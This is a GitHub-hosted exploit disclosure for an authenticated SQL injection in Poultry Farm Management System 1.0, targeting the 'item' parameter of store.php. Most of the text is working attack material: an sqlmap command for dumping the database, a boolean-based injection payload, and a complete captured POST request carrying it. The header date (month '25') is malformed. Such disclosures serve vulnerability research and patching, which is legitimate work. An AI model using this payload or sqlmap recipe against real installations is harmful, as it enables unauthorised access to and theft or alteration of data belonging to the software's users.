-
Notifications
You must be signed in to change notification settings - Fork 1
/
Copy pathSQL Injection For Poultry Farm Management system 1.0
68 lines (50 loc) · 2.1 KB
/
SQL Injection For Poultry Farm Management system 1.0
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
# Exploit Title: Poultry Farm Management System 1.0 - 'item' SQL Injection (Authenticated)
# Date: 2022-25-03
# Exploit Author: Ibrahim Ekim Isik
# Vendor Homepage: https://www.sourcecodester.com/php/15230/poultry-farm-management-system-free-download.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/Redcock-Farm.zip
# Version: 1.0
# Tested on: Windows 10 Pro + PHP 8.0.11, Apache 2.4.51
------------------------------------------------------------------------------------
1. Description:
----------------------
Poultry Farm Management System 1.0 allows SQL Injection via parameter 'item' in
/Redcock-Farm/farm/store.php. Exploiting this issue could allow an attacker to compromise
the application, access or modify data, or exploit latent vulnerabilities
in the underlying database.
2. Proof of Concept:
----------------------
In Burpsuite intercept the request from the affected page with
'item' parameter and save it like poc.txt. Then run SQLmap to extract the
data from the database:
sqlmap -r poc.txt --dbms=mysql
3. Example payload:
----------------------
(boolean based)
-1+OR+17-7%3d10
4. Burpsuite request:
----------------------
POST /Redcock-Farm/farm/store.php HTTP/1.1
Host: localhost
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Content-Length: 407
Content-Type: multipart/form-data; boundary=e4859a5b5a1543d7962cf80e9e6b67b6
Cookie: PHPSESSID=o6t9s6hag9pu014fch5g4ge5i3
Referer: http://localhost/Redcock-Farm/farm/store.php
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36
--e4859a5b5a1543d7962cf80e9e6b67b6
Content-Disposition: form-data; name="item"
-1 OR 17-7=10
--e4859a5b5a1543d7962cf80e9e6b67b6
Content-Disposition: form-data; name="date"
01/01/2011
--e4859a5b5a1543d7962cf80e9e6b67b6
Content-Disposition: form-data; name="quantity"
3
--e4859a5b5a1543d7962cf80e9e6b67b6
Content-Disposition: form-data; name="save"
3
--e4859a5b5a1543d7962cf80e9e6b67b6--